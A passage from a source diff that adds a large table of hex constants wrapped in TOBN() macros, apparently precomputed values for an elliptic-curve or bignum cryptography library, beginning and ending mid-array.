+     TOBN(0x4b67a5f1, 0xcf1d9e9d), TOBN(0xc6542e47, 0xa5d8d8ce),
+     TOBN(0x73061fe8, 0x7adfb6cc), TOBN(0xcc826fd3, 0x98678141),
+     TOBN(0x00e758b1, 0x3c80515a), TOBN(0x6afe3247, 0x41485083),
+     TOBN(0x0fcb08b9, 0xb6ae8a75), TOBN(0xb8cf388d, 0x4acf51e1),
+     TOBN(0x344a5560, 0x6961b9d6), TOBN(0x1a6778b8, 0x6a97fd0c),
+     TOBN(0xd840fdc1, 0xecc4c7e3), TOBN(0xde9fe47d, 0x16db68cc),
+     TOBN(0xe95f89de, 0xa3e216aa), TOBN(0x84f1a6a4, 0x9594a8be),
+     TOBN(0x7ddc7d72, 0x5a7b162b), TOBN(0xc5cfda19, 0xadc817a3),
+     TOBN(0x80a5d350, 0x78b58d46), TOBN(0x93365b13, 0x82978f19),
+     TOBN(0x2e44d225, 0x26a1fc90), TOBN(0x0d6d10d2, 0x4d70705d),
+     TOBN(0xd94b6b10, 0xd70c45f4), TOBN(0x0f201022, 0xb216c079),
+     TOBN(0xcec966c5, 0x658fde41), TOBN(0xa8d2bc7d, 0x7e27601d),
+     TOBN(0xbfcce3e1, 0xff230be7), TOBN(0x3394ff6b, 0x0033ffb5),
+     TOBN(0xd890c509, 0x8132c9af), TOBN(0xaac4b0eb, 0x361e7868),
+     TOBN(0x5194ded3, 0xe82d15aa), TOBN(0x4550bd2e, 0x23ae6b7d),
+     TOBN(0x3fda318e, 0xea5399d4), TOBN(0xd989bffa, 0x91638b80),
+     TOBN(0x5ea124d0, 0xa14aa12d), TOBN(0x1fb1b899, 0x3667b944),
+     TOBN(0x95ec7969, 0x44c44d6a), TOBN(0x91df144a, 0x57e86137),
+     TOBN(0x915fd620, 0x73adac44), TOBN(0x8f01732d, 0x59a83801),
+     TOBN(0xec579d25, 0x3aa0a633), TOBN(0x06de5e7c, 0xc9d6d59c),
+     TOBN(0xc132f958, 0xb1ef8010), TOBN(0x29476f96, 0xe65c1a02),
+     TOBN(0x336a77c0, 0xd34c3565), TOBN(0xef1105b2, 0x1b9f1e9e),
+     TOBN(0x63e6d08b, 0xf9e08002), TOBN(0x9aff2f21, 0xc613809e),
+     TOBN(0xb5754f85, 0x3a80e75d), TOBN(0xde71853e, 0x6bbda681),
+     TOBN(0x86f041df, 0x8197fd7a), TOBN(0x8b332e08, 0x127817fa),
+     TOBN(0x05d99be8, 0xb9c20cda), TOBN(0x89f7aad5, 0xd5cd0c98),
+     TOBN(0x7ef936fe, 0x5bb94183), TOBN(0x92ca0753, 0xb05cd7f2),
+     TOBN(0x9d65db11, 0x74a1e035), TOBN(0x02628cc8, 0x13eaea92),
+     TOBN(0xf2d9e242, 0x49e4fbf2), TOBN(0x94fdfd9b, 0xe384f8b7),
+     TOBN(0x65f56054, 0x63428c6b), TOBN(0x2f7205b2, 0x90b409a5),
+     TOBN(0xf778bb78, 0xff45ae11), TOBN(0xa13045be, 0xc5ee53b2),
+     TOBN(0xe00a14ff, 0x03ef77fe), TOBN(0x689cd59f, 0xffef8bef),
+     TOBN(0x3578f0ed, 0x1e9ade22), TOBN(0xe99f3ec0, 0x6268b6a8),
+     TOBN(0xa2057d91, 0xea1b3c3e), TOBN(0x2d1a7053, 0xb8823a4a),
+     TOBN(0xabbb336a, 0x2cca451e), TOBN(0xcd2466e3, 0x2218bb5d),
+     TOBN(0x3ac1f42f, 0xc8cb762d), TOBN(0x7e312aae, 0x7690211f),
+     TOBN(0xebb9bd73, 0x45d07450), TOBN(0x207c4b82, 0x46c2213f),
+     TOBN(0x99d425c1, 0x375913ec), TOBN(0x94e45e96, 0x67908220),
+     TOBN(0xc08f3087, 0xcd67dbf6), TOBN(0xa5670fbe, 0xc0887056),
+     TOBN(0x6717b64a, 0x66f5b8fc), TOBN(0xd5a56aea, 0x786fec28),
+     TOBN(0xa8c3f55f, 0xc0ff4952), TOBN(0xa77fefae, 0x457ac49b),
+     TOBN(0x29882d7c, 0x98379d44), TOBN(0xd000bdfb, 0x509edc8a),
+     TOBN(0xc6f95979, 0xe66fe464), TOBN(0x504a6115, 0xfa61bde0),
+     TOBN(0x56b3b871, 0xeffea31a), TOBN(0x2d3de26d, 0xf0c21a54),
+     TOBN(0x21dbff31, 0x834753bf), TOBN(0xe67ecf49, 0x69269d86),
+     TOBN(0x7a176952, 0x151fe690), TOBN(0x03515804, 0x7f2adb5f),
+     TOBN(0xee794b15, 0xd1b62a8d), TOBN(0xf004ceec, 0xaae454e6),
+     TOBN(0x0897ea7c, 0xf0386fac), TOBN(0x3b62ff12, 0xd1fca751),
+     TOBN(0x154181df, 0x1b7a04ec), TOBN(0x2008e04a, 0xfb5847ec),
+     TOBN(0xd147148e, 0x41dbd772), TOBN(0x2b419f73, 0x22942654),
+     TOBN(0x669f30d3, 0xe9c544f7), TOBN(0x52a2c223, 0xc8540149),
+     TOBN(0x5da9ee14, 0x634dfb02), TOBN(0x5f074ff0, 0xf47869f3),
+     TOBN(0x74ee878d, 0xa3933acc), TOBN(0xe6510651, 0x4fe35ed1),
+     TOBN(0xb3eb9482, 0xf1012e7a), TOBN(0x51013cc0, 0xa8a566ae),
+     TOBN(0xdd5e9243, 0x47c00d3b), TOBN(0x7fde089d, 0x946bb0e5),
+     TOBN(0x030754fe, 0xc731b4b3), TOBN(0x12a136a4, 0x99fda062),
+     TOBN(0x7c1064b8, 0x5a1a35bc), TOBN(0xbf1f5763, 0x446c84ef),
+     TOBN(0xed29a56d, 0xa16d4b34), TOBN(0x7fba9d09, 0xdca21c4f),
+     TOBN(0x66d7ac00, 0x6d8de486), TOBN(0x60061987, 0x73a2a5e1),
+     TOBN(0x8b400f86, 0x9da28ff0), TOBN(0x3133f708, 0x43c4599c),
+     TOBN(0x9911c9b8, 0xee28cb0d), TOBN(0xcd7e2874, 0x8e0af61d),
+     TOBN(0x5a85f0f2, 0x72ed91fc), TOBN(0x85214f31, 0x9cd4a373),
+     TOBN(0x881fe5be, 0x1925253c), TOBN(0xd8dc98e0, 0x91e8bc76),
+     TOBN(0x7120affe, 0x585cc3a2), TOBN(0x724952ed, 0x735bf97a),
+     TOBN(0x5581e7dc, 0x3eb34581), TOBN(0x5cbff4f2, 0xe52ee57d),
+     TOBN(0x8d320a0e, 0x87d8cc7b), TOBN(0x9beaa7f3, 0xf1d280d0),
+     TOBN(0x7a0b9571, 0x9beec704), TOBN(0x9126332e, 0x5b7f0057),
+     TOBN(0x01fbc1b4, 0x8ed3bd6d), TOBN(0x35bb2c12, 0xd945eb24),
+     TOBN(0x6404694e, 0x9a8ae255), TOBN(0xb6092eec, 0x8d6abfb3),
+     TOBN(0x4d76143f, 0xcc058865), TOBN(0x7b0a5af2, 0x6e249922),
+     TOBN(0x8aef9440, 0x6a50d353), TOBN(0xe11e4bcc, 0x64f0e07a),
+     TOBN(0x4472993a, 0xa14a90fa), TOBN(0x7706e20c, 0xba0c51d4),
+     TOBN(0xf403292f, 0x1532672d), TOBN(0x52573bfa, 0x21829382),
+     TOBN(0x6a7bb6a9, 0x3b5bdb83), TOBN(0x08da65c0, 0xa4a72318),
+     TOBN(0xc58d22aa, 0x63eb065f), TOBN(0x1717596c, 0x1b15d685),
+     TOBN(0x112df0d0, 0xb266d88b), TOBN(0xf688ae97, 0x5941945a),
+     TOBN(0x487386e3, 0x7c292cac), TOBN(0x42f3b50d, 0x57d6985c),
+     TOBN(0x6da4f998, 0x6a90fc34), TOBN(0xc8f257d3, 0x65ca8a8d),
+     TOBN(0xc2feabca, 0x6951f762), TOBN(0xe1bc81d0, 0x74c323ac),
+     TOBN(0x1bc68f67, 0x251a2a12), TOBN(0x10d86587, 0xbe8a70dc),
+     TOBN(0xd648af7f, 0xf0f84d2e), TOBN(0xf0aa9ebc, 0x6a43ac92),
+     TOBN(0x69e3be04, 0x27596893), TOBN(0xb6bb02a6, 0x45bf452b),
+     TOBN(0x0875c11a, 0xf4c698c8), TOBN(0x6652b5c7, 0xbece3794),
+     TOBN(0x7b3755fd, 0x4f5c0499), TOBN(0x6ea16558, 0xb5532b38),
+     TOBN(0xd1c69889, 0xa2e96ef7), TOBN(0x9c773c3a, 0x61ed8f48),
+     TOBN(0x2b653a40, 0x9b323abc), TOBN(0xe26605e1, 0xf0e1d791),
+     TOBN(0x45d41064, 0x4a87157a), TOBN(0x8f9a78b7, 0xcbbce616),
+     TOBN(0xcf1e44aa, 0xc407eddd), TOBN(0x81ddd1d8, 0xa35b964f),
+     TOBN(0x473e339e, 0xfd083999), TOBN(0x6c94bdde, 0x8e796802),
+     TOBN(0x5a304ada, 0x8545d185), TOBN(0x82ae44ea, 0x738bb8cb),
+     TOBN(0x628a35e3, 0xdf87e10e), TOBN(0xd3624f3d, 0xa15b9fe3),
+     TOBN(0xcc44209b, 0x14be4254), TOBN(0x7d0efcbc, 0xbdbc2ea5),
+     TOBN(0x1f603362, 0x04c37bbe), TOBN(0x21f363f5, 0x56a5852c),
+     TOBN(0xa1503d1c, 0xa8501550), TOBN(0x2251e0e1, 0xd8ab10bb),
+     TOBN(0xde129c96, 0x6961c51c), TOBN(0x1f7246a4, 0x81910f68),
+     TOBN(0x2eb744ee, 0x5f2591f2), TOBN(0x3c47d33f, 0x5e627157),
+     TOBN(0x4d6d62c9, 0x22f3bd68), TOBN(0x6120a64b, 0xcb8df856),
+     TOBN(0x3a9ac6c0, 0x7b5d07df), TOBN(0xa92b9558, 0x7ef39783),
+     TOBN(0xe128a134, 0xab3a9b4f), TOBN(0x41c18807, 0xb1252f05),
+     TOBN(0xfc7ed089, 0x80ba9b1c), TOBN(0xac8dc6de, 0xc532a9dd),
+     TOBN(0xbf829cef, 0x55246809), TOBN(0x101b784f, 0x5b4ee80f),
+     TOBN(0xc09945bb, 0xb6f11603), TOBN(0x57b09dbe, 0x41d2801e),
+     TOBN(0xfba5202f, 0xa97534a8), TOBN(0x7fd8ae5f, 0xc17b9614),
+     TOBN(0xa50ba666, 0x78308435), TOBN(0x9572f77c, 0xd3868c4d),
+     TOBN(0x0cef7bfd, 0x2dd7aab0), TOBN(0xe7958e08, 0x2c7c79ff),
+     TOBN(0x81262e42, 0x25346689), TOBN(0x716da290, 0xb07c7004),
+     TOBN(0x35f911ea, 0xb7950ee3), TOBN(0x6fd72969, 0x261d21b5),
+     TOBN(0x52389803, 0x08b640d3), TOBN(0x5b0026ee, 0x887f12a1),
+     TOBN(0x20e21660, 0x742e9311), TOBN(0x0ef6d541, 0x5ff77ff7),
+     TOBN(0x969127f0, 0xf9c41135), TOBN(0xf21d60c9, 0x68a64993),
+     TOBN(0x656e5d0c, 0xe541875c), TOBN(0xf1e0f84e, 0xa1d3c233),
+     TOBN(0x9bcca359, 0x06002d60), TOBN(0xbe2da60c, 0x06191552),
+     TOBN(0x5da8bbae, 0x61181ec3), TOBN(0x9f04b823, 0x65806f19),
+     TOBN(0xf1604a7d, 0xd4b79bb8), TOBN(0xaee806fb, 0x52c878c8),
+     TOBN(0x34144f11, 0x8d47b8e8), TOBN(0x72edf52b, 0x949f9054),
+     TOBN(0xebfca84e, 0x2127015a), TOBN(0x9051d0c0, 0x9cb7cef3),
+     TOBN(0x86e8fe58, 0x296deec8), TOBN(0x33b28188, 0x41010d74),}
+    ,
+    {TOBN(0x01079383, 0x171b445f), TOBN(0x9bcf21e3, 0x8131ad4c),
+     TOBN(0x8cdfe205, 0xc93987e8), TOBN(0xe63f4152, 0xc92e8c8f),
+     TOBN(0x729462a9, 0x30add43d), TOBN(0x62ebb143, 0xc980f05a),
+     TOBN(0x4f3954e5, 0x3b06e968), TOBN(0xfe1d75ad, 0x242cf6b1),
+     TOBN(0x5f95c6c7, 0xaf8685c8), TOBN(0xd4c1c8ce, 0x2f8f01aa),
+     TOBN(0xc44bbe32, 0x2574692a), TOBN(0xb8003478, 0xd4a4a068),
+     TOBN(0x7c8fc6e5, 0x2eca3cdb), TOBN(0xea1db16b, 0xec04d399),
+     TOBN(0xb05bc82e, 0x8f2bc5cf), TOBN(0x763d517f, 0xf44793d2),
+     TOBN(0x4451c1b8, 0x08bd98d0), TOBN(0x644b1cd4, 0x6575f240),
+     TOBN(0x6907eb33, 0x7375d270), TOBN(0x56c8bebd, 0xfa2286bd),
+     TOBN(0xc713d2ac, 0xc4632b46), TOBN(0x17da427a, 0xafd60242),
+     TOBN(0x313065b7, 0xc95c7546), TOBN(0xf8239898, 0xbf17a3de),
+     TOBN(0xf3b7963f, 0x4c830320), TOBN(0x842c7aa0, 0x903203e3),
+     TOBN(0xaf22ca0a, 0xe7327afb), TOBN(0x38e13092, 0x967609b6),
+     TOBN(0x73b8fb62, 0x757558f1), TOBN(0x3cc3e831, 0xf7eca8c1),
+     TOBN(0xe4174474, 0xf6331627), TOBN(0xa77989ca, 0xc3c40234),
+     TOBN(0xe5fd17a1, 0x44a081e0), TOBN(0xd797fb7d, 0xb70e296a),
+     TOBN(0x2b472b30, 0x481f719c), TOBN(0x0e632a98, 0xfe6f8c52),
+     TOBN(0x89ccd116, 0xc5f0c284), TOBN(0xf51088af, 0x2d987c62),
+     TOBN(0x2a2bccda, 0x4c2de6cf), TOBN(0x810f9efe, 0xf679f0f9),
+     TOBN(0xb0f394b9, 0x7ffe4b3e), TOBN(0x0b691d21, 0xe5fa5d21),
+     TOBN(0xb0bd7747, 0x9dfbbc75), TOBN(0xd2830fda, 0xfaf78b00),
+     TOBN(0xf78c249c, 0x52434f57), TOBN(0x4b1f7545, 0x98096dab),
+     TOBN(0x73bf6f94, 0x8ff8c0b3), TOBN(0x34aef03d, 0x454e134c),
+     TOBN(0xf8d151f4, 0xb7ac7ec5), TOBN(0xd6ceb95a, 0xe50da7d5),
+     TOBN(0xa1b492b0, 0xdc3a0eb8), TOBN(0x75157b69, 0xb3dd2863),
+     TOBN(0xe2c4c74e, 0xc5413d62), TOBN(0xbe329ff7, 0xbc5fc4c7),
+     TOBN(0x835a2aea, 0x60fa9dda), TOBN(0xf117f5ad, 0x7445cb87),
+     TOBN(0xae8317f4, 0xb0166f7a), TOBN(0xfbd3e3f7, 0xceec74e6),
+     TOBN(0xfdb516ac, 0xe0874bfd), TOBN(0x3d846019, 0xc681f3a3),
+     TOBN(0x0b12ee5c, 0x7c1620b0), TOBN(0xba68b4dd, 0x2b63c501),
+     TOBN(0xac03cd32, 0x6668c51e), TOBN(0x2a6279f7, 0x4e0bcb5b),
+     TOBN(0x17bd69b0, 0x6ae85c10), TOBN(0x72946979, 0x1dfdd3a6),
+     TOBN(0xd9a03268, 0x2c078bec), TOBN(0x41c6a658, 0xbfd68a52),
+     TOBN(0xcdea1024, 0x0e023900), TOBN(0xbaeec121, 0xb10d144d),
+     TOBN(0x5a600e74, 0x058ab8dc), TOBN(0x1333af21, 0xbb89ccdd),
+     TOBN(0xdf25eae0, 0x3aaba1f1), TOBN(0x2cada16e, 0x3b7144cf),
+     TOBN(0x657ee27d, 0x71ab98bc), TOBN(0x99088b4c, 0x7a6fc96e),
+     TOBN(0x05d5c0a0, 0x3549dbd4), TOBN(0x42cbdf8f, 0xf158c3ac),
+     TOBN(0x3fb6b3b0, 0x87edd685), TOBN(0x22071cf6, 0x86f064d0),
+     TOBN(0xd2d6721f, 0xff2811e5), TOBN(0xdb81b703, 0xfe7fae8c),
+     TOBN(0x3cfb74ef, 0xd3f1f7bb), TOBN(0x0cdbcd76, 0x16cdeb5d),
+     TOBN(0x4f39642a, 0x566a808c), TOBN(0x02b74454, 0x340064d6),
+     TOBN(0xfabbadca, 0x0528fa6f), TOBN(0xe4c3074c, 0xd3fc0bb6),
+     TOBN(0xb32cb8b0, 0xb796d219), TOBN(0xc3e95f4f, 0x34741dd9),
+     TOBN(0x87212125, 0x68edf6f5), TOBN(0x7a03aee4, 0xa2b9cb8e),
+     TOBN(0x0cd3c376, 0xf53a89aa), TOBN(0x0d8af9b1, 0x948a28dc),
+     TOBN(0xcf86a3f4, 0x902ab04f), TOBN(0x8aacb62a, 0x7f42002d),
+     TOBN(0x106985eb, 0xf62ffd52), TOBN(0xe670b54e, 0x5797bf10),
+     TOBN(0x4b405209, 0xc5e30aef), TOBN(0x12c97a20, 0x4365b5e9),
+     TOBN(0x104646ce, 0x1fe32093), TOBN(0x13cb4ff6, 0x3907a8c9),
+     TOBN(0x8b9f30d1, 0xd46e726b), TOBN(0xe1985e21, 0xaba0f499),
+     TOBN(0xc573dea9, 0x10a230cd), TOBN(0x24f46a93, 0xcd30f947),
+     TOBN(0xf2623fcf, 0xabe2010a), TOBN(0x3f278cb2, 0x73f00e4f),
+     TOBN(0xed55c67d, 0x50b920eb), TOBN(0xf1cb9a2d, 0x8e760571),
+     TOBN(0x7c50d109, 0x0895b709), TOBN(0x4207cf07, 0x190d4369),
+     TOBN(0x3b027e81, 0xc4127fe1), TOBN(0xa9f8b9ad, 0x3ae9c566),
+     TOBN(0x5ab10851, 0xacbfbba5), TOBN(0xa747d648, 0x569556f5),
+     TOBN(0xcc172b5c, 0x2ba97bf7), TOBN(0x15e0f77d, 0xbcfa3324),
+     TOBN(0xa345b797, 0x7686279d), TOBN(0x5a723480, 0xe38003d3),
+     TOBN(0xfd8e139f, 0x8f5fcda8), TOBN(0xf3e558c4, 0xbdee5bfd),
+     TOBN(0xd76cbaf4, 0xe33f9f77), TOBN(0x3a4c97a4, 0x71771969),
+     TOBN(0xda27e84b, 0xf6dce6a7), TOBN(0xff373d96, 0x13e6c2d1),
+     TOBN(0xf115193c, 0xd759a6e9), TOBN(0x3f9b7025, 0x63d2262c),
+     TOBN(0xd9764a31, 0x317cd062), TOBN(0x30779d8e, 0x199f8332),
+     TOBN(0xd8074106, 0x16b11b0b), TOBN(0x7917ab9f, 0x78aeaed8),
+     TOBN(0xb67a9cbe, 0x28fb1d8e), TOBN(0x2e313563, 0x136eda33),
+     TOBN(0x010b7069, 0xa371a86c), TOBN(0x44d90fa2, 0x6744e6b7),
+     TOBN(0x68190867, 0xd6b3e243), TOBN(0x9fe6cd9d, 0x59048c48),
+     TOBN(0xb900b028, 0x95731538), TOBN(0xa012062f, 0x32cae04f),
+     TOBN(0x8107c8bc, 0x9399d082), TOBN(0x47e8c54a, 0x41df12e2),
+     TOBN(0x14ba5117, 0xb6ef3f73), TOBN(0x22260bea, 0x81362f0b),
+     TOBN(0x90ea261e, 0x1a18cc20), TOBN(0x2192999f, 0x2321d636),
+     TOBN(0xef64d314, 0xe311b6a0), TOBN(0xd7401e4c, 0x3b54a1f5),
+     TOBN(0x19019983, 0x6fbca2ba), TOBN(0x46ad3293, 0x8fbffc4b),
+     TOBN(0xa142d3f6, 0x3786bf40), TOBN(0xeb5cbc26, 0xb67039fc),
+     TOBN(0x9cb0ae6c, 0x252bd479), TOBN(0x05e0f88a, 0x12b5848f),
+     TOBN(0x78f6d2b2, 0xa5c97663), TOBN(0x6f6e149b, 0xc162225c),
+     TOBN(0xe602235c, 0xde601a89), TOBN(0xd17bbe98, 0xf373be1f),
+     TOBN(0xcaf49a5b, 0xa8471827), TOBN(0x7e1a0a85, 0x18aaa116),
+     TOBN(0x6c833196, 0x270580c3), TOBN(0x1e233839, 0xf1c98a14),
+     TOBN(0x67b2f7b4, 0xae34e0a5), TOBN(0x47ac8745, 0xd8ce7289),
+     TOBN(0x2b74779a, 0x100dd467), TOBN(0x274a4337, 0x4ee50d09),
+     TOBN(0x603dcf13, 0x83608bc9), TOBN(0xcd9da6c3, 0xc89e8388),
+     TOBN(0x2660199f, 0x355116ac), TOBN(0xcc38bb59, 0xb6d18eed),
+     TOBN(0x3075f31f, 0x2f4bc071), TOBN(0x9774457f, 0x265dc57e),
+     TOBN(0x06a6a9c8, 0xc6db88bb), TOBN(0x6429d07f, 0x4ec98e04),
+     TOBN(0x8d05e57b, 0x05ecaa8b), TOBN(0x20f140b1, 0x7872ea7b),
+     TOBN(0xdf8c0f09, 0xca494693), TOBN(0x48d3a020, 0xf252e909),
+     TOBN(0x4c5c29af, 0x57b14b12), TOBN(0x7e6fa37d, 0xbf47ad1c),
+     TOBN(0x66e7b506, 0x49a0c938), TOBN(0xb72c0d48, 0x6be5f41f),
+     TOBN(0x6a6242b8, 0xb2359412), TOBN(0xcd35c774, 0x8e859480),
+     TOBN(0x12536fea, 0x87baa627), TOBN(0x58c1fec1, 0xf72aa680),
+     TOBN(0x6c29b637, 0x601e5dc9), TOBN(0x9e3c3c1c, 0xde9e01b9),
+     TOBN(0xefc8127b, 0x2bcfe0b0), TOBN(0x35107102, 0x2a12f50d),
+     TOBN(0x6ccd6cb1, 0x4879b397), TOBN(0xf792f804, 0xf8a82f21),
+     TOBN(0x509d4804, 0xa9b46402), TOBN(0xedddf85d, 0xc10f0850),
+     TOBN(0x928410dc, 0x4b6208aa), TOBN(0xf6229c46, 0x391012dc),
+     TOBN(0xc5a7c41e, 0x7727b9b6), TOBN(0x289e4e4b, 0xaa444842),
+     TOBN(0x049ba1d9, 0xe9a947ea), TOBN(0x44f9e47f, 0x83c8debc),
+     TOBN(0xfa77a1fe, 0x611f8b8e), TOBN(0xfd2e416a, 0xf518f427),
+     TOBN(0xc5fffa70, 0x114ebac3), TOBN(0xfe57c4e9, 0x5d89697b),
+     TOBN(0xfdd053ac, 0xb1aaf613), TOBN(0x31df210f, 0xea585a45),
+     TOBN(0x318cc10e, 0x24985034), TOBN(0x1a38efd1, 0x5f1d6130),
+     TOBN(0xbf86f237, 0x0b1e9e21), TOBN(0xb258514d, 0x1dbe88aa),
+     TOBN(0x1e38a588, 0x90c1baf9), TOBN(0x2936a01e, 0xbdb9b692),
+     TOBN(0xd576de98, 0x6dd5b20c), TOBN(0xb586bf71, 0x70f98ecf),
+     TOBN(0xcccf0f12, 0xc42d2fd7), TOBN(0x8717e61c, 0xfb35bd7b),
+     TOBN(0x8b1e5722, 0x35e6fc06), TOBN(0x3477728f, 0x0b3e13d5),
+     TOBN(0x150c294d, 0xaa8a7372), TOBN(0xc0291d43, 0x3bfa528a),
+     TOBN(0xc6c8bc67, 0xcec5a196), TOBN(0xdeeb31e4, 0x5c2e8a7c),
+     TOBN(0xba93e244, 0xfb6e1c51), TOBN(0xb9f8b71b, 0x2e28e156),
+     TOBN(0xce65a287, 0x968a2ab9), TOBN(0xe3c5ce69, 0x46bbcb1f),
+     TOBN(0xf8c835b9, 0xe7ae3f30), TOBN(0x16bbee26, 0xff72b82b),
+     TOBN(0x665e2017, 0xfd42cd22), TOBN(0x1e139970, 0xf8b1d2a0),
+     TOBN(0x125cda29, 0x79204932), TOBN(0x7aee94a5, 0x49c3bee5),
+     TOBN(0x68c70160, 0x89821a66), TOBN(0xf7c37678, 0x8f981669),
+     TOBN(0xd90829fc, 0x48cc3645), TOBN(0x346af049, 0xd70addfc),
+     TOBN(0x2057b232, 0x370bf29c), TOBN(0xf90c73ce, 0x42e650ee),
+     TOBN(0xe03386ea, 0xa126ab90), TOBN(0x0e266e7e, 0x975a087b),
+     TOBN(0x80578eb9, 0x0fca65d9), TOBN(0x7e2989ea, 0x16af45b8),
+     TOBN(0x7438212d, 0xcac75a4e), TOBN(0x38c7ca39, 0x4fef36b8),
+     TOBN(0x8650c494, 0xd402676a), TOBN(0x26ab5a66, 0xf72c7c48),
+     TOBN(0x4e6cb426, 0xce3a464e), TOBN(0xf8f99896, 0x2b72f841),
+     TOBN(0x8c318491, 0x1a335cc8), TOBN(0x563459ba, 0x6a5913e4),
+     TOBN(0x1b920d61, 0xc7b32919), TOBN(0x805ab8b6, 0xa02425ad),
+     TOBN(0x2ac512da, 0x8d006086), TOBN(0x6ca4846a, 0xbcf5c0fd),
+     TOBN(0xafea51d8, 0xac2138d7), TOBN(0xcb647545, 0x344cd443),
+     TOBN(0x0429ee8f, 0xbd7d9040), TOBN(0xee66a2de, 0x819b9c96),
+     TOBN(0x54f9ec25, 0xdea7d744), TOBN(0x2ffea642, 0x671721bb),
+     TOBN(0x4f19dbd1, 0x114344ea), TOBN(0x04304536, 0xfd0dbc8b),
+     TOBN(0x014b50aa, 0x29ec7f91), TOBN(0xb5fc22fe, 0xbb06014d),
+     TOBN(0x60d963a9, 0x1ee682e0), TOBN(0xdf48abc0, 0xfe85c727),
+     TOBN(0x0cadba13, 0x2e707c2d), TOBN(0xde608d3a, 0xa645aeff),
+     TOBN(0x05f1c28b, 0xedafd883), TOBN(0x3c362ede, 0xbd94de1f),
+     TOBN(0x8dd0629d, 0x13593e41), TOBN(0x0a5e736f, 0x766d6eaf),
+     TOBN(0xbfa92311, 0xf68cf9d1), TOBN(0xa4f9ef87, 0xc1797556),
+     TOBN(0x10d75a1f, 0x5601c209), TOBN(0x651c374c, 0x09b07361),
+     TOBN(0x49950b58, 0x88b5cead), TOBN(0x0ef00058, 0x6fa9dbaa),
+     TOBN(0xf51ddc26, 0x4e15f33a), TOBN(0x1f8b5ca6, 0x2ef46140),
+     TOBN(0x343ac0a3, 0xee9523f0), TOBN(0xbb75eab2, 0x975ea978),
+     TOBN(0x1bccf332, 0x107387f4), TOBN(0x790f9259, 0x9ab0062e),
+     TOBN(0xf1a363ad, 0x1e4f6a5f), TOBN(0x06e08b84, 0x62519a50),
+     TOBN(0x60915187, 0x7265f1ee), TOBN(0x6a80ca34, 0x93ae985e),
+     TOBN(0x81b29768, 0xaaba4864), TOBN(0xb13cabf2, 0x8d52a7d6),
+     TOBN(0xb5c36348, 0x8ead03f1), TOBN(0xc932ad95, 0x81c7c1c0),
+     TOBN(0x5452708e, 0xcae1e27b), TOBN(0x9dac4269, 0x1b0df648),
+     TOBN(0x233e3f0c, 0xdfcdb8bc), TOBN(0xe6ceccdf, 0xec540174),
+     TOBN(0xbd0d845e, 0x95081181), TOBN(0xcc8a7920, 0x699355d5),
+     TOBN(0x111c0f6d, 0xc3b375a8), TOBN(0xfd95bc6b, 0xfd51e0dc),
+     TOBN(0x4a106a26, 0x6888523a), TOBN(0x4d142bd6, 0xcb01a06d),
+     TOBN(0x79bfd289, 0xadb9b397), TOBN(0x0bdbfb94, 0xe9863914),
+     TOBN(0x29d8a229, 0x1660f6a6), TOBN(0x7f6abcd6, 0x551c042d),
+     TOBN(0x13039deb, 0x0ac3ffe8), TOBN(0xa01be628, 0xec8523fb),
+     TOBN(0x6ea34103, 0x0ca1c328), TOBN(0xc74114bd, 0xb903928e),
+     TOBN(0x8aa4ff4e, 0x9e9144b0), TOBN(0x7064091f, 0x7f9a4b17),
+     TOBN(0xa3f4f521, 0xe447f2c4), TOBN(0x81b8da7a, 0x604291f0),
+     TOBN(0xd680bc46, 0x7d5926de), TOBN(0x84f21fd5, 0x34a1202f),
+     TOBN(0x1d1e3181, 0x4e9df3d8), TOBN(0x1ca4861a, 0x39ab8d34),
+     TOBN(0x809ddeec, 0x5b19aa4a), TOBN(0x59f72f7e, 0x4d329366),
+     TOBN(0xa2f93f41, 0x386d5087), TOBN(0x40bf739c, 0xdd67d64f),
+     TOBN(0xb4494205, 0x66702158), TOBN(0xc33c65be, 0x73b1e178),
+     TOBN(0xcdcd657c, 0x38ca6153), TOBN(0x97f4519a, 0xdc791976),
+     TOBN(0xcc7c7f29, 0xcd6e1f39), TOBN(0x38de9cfb, 0x7e3c3932),
+     TOBN(0xe448eba3, 0x7b793f85), TOBN(0xe9f8dbf9, 0xf067e914),
+     TOBN(0xc0390266, 0xf114ae87), TOBN(0x39ed75a7, 0xcd6a8e2a),
+     TOBN(0xadb14848, 0x7ffba390), TOBN(0x67f8cb8b, 0x6af9bc09),
+     TOBN(0x322c3848, 0x9c7476db), TOBN(0xa320fecf, 0x52a538d6),
+     TOBN(0xe0493002, 0xb2aced2b), TOBN(0xdfba1809, 0x616bd430),
+     TOBN(0x531c4644, 0xc331be70), TOBN(0xbc04d32e, 0x90d2e450),
+     TOBN(0x1805a0d1, 0x0f9f142d), TOBN(0x2c44a0c5, 0x47ee5a23),
+     TOBN(0x31875a43, 0x3989b4e3), TOBN(0x6b1949fd, 0x0c063481),
+     TOBN(0x2dfb9e08, 0xbe0f4492), TOBN(0x3ff0da03, 0xe9d5e517),
+     TOBN(0x03dbe9a1, 0xf79466a8), TOBN(0x0b87bcd0, 0x15ea9932),
+     TOBN(0xeb64fc83, 0xab1f58ab), TOBN(0x6d9598da, 0x817edc8a),
+     TOBN(0x699cff66, 0x1d3b67e5), TOBN(0x645c0f29, 0x92635853),
+     TOBN(0x253cdd82, 0xeabaf21c), TOBN(0x82b9602a, 0x2241659e),
+     TOBN(0x2cae07ec, 0x2d9f7091), TOBN(0xbe4c720c, 0x8b48cd9b),
+     TOBN(0x6ce5bc03, 0x6f08d6c9), TOBN(0x36e8a997, 0xaf10bf40),
+     TOBN(0x83422d21, 0x3e10ff12), TOBN(0x7b26d3eb, 0xbcc12494),
+     TOBN(0xb240d2d0, 0xc9469ad6), TOBN(0xc4a11b4d, 0x30afa05b),
+     TOBN(0x4b604ace, 0xdd6ba286), TOBN(0x18486600, 0x3ee2864c),
+     TOBN(0x5869d6ba, 0x8d9ce5be), TOBN(0x0d8f68c5, 0xff4bfb0d),
+     TOBN(0xb69f210b, 0x5700cf73), TOBN(0x61f6653a, 0x6d37c135),
+     TOBN(0xff3d432b, 0x5aff5a48), TOBN(0x0d81c4b9, 0x72ba3a69),
+     TOBN(0xee879ae9, 0xfa1899ef), TOBN(0xbac7e2a0, 0x2d6acafd),
+     TOBN(0xd6d93f6c, 0x1c664399), TOBN(0x4c288de1, 0x5bcb135d),
+     TOBN(0x83031dab, 0x9dab7cbf), TOBN(0xfe23feb0, 0x3abbf5f0),
+     TOBN(0x9f1b2466, 0xcdedca85), TOBN(0x140bb710, 0x1a09538c),
+     TOBN(0xac8ae851, 0x5e11115d), TOBN(0x0d63ff67, 0x6f03f59e),
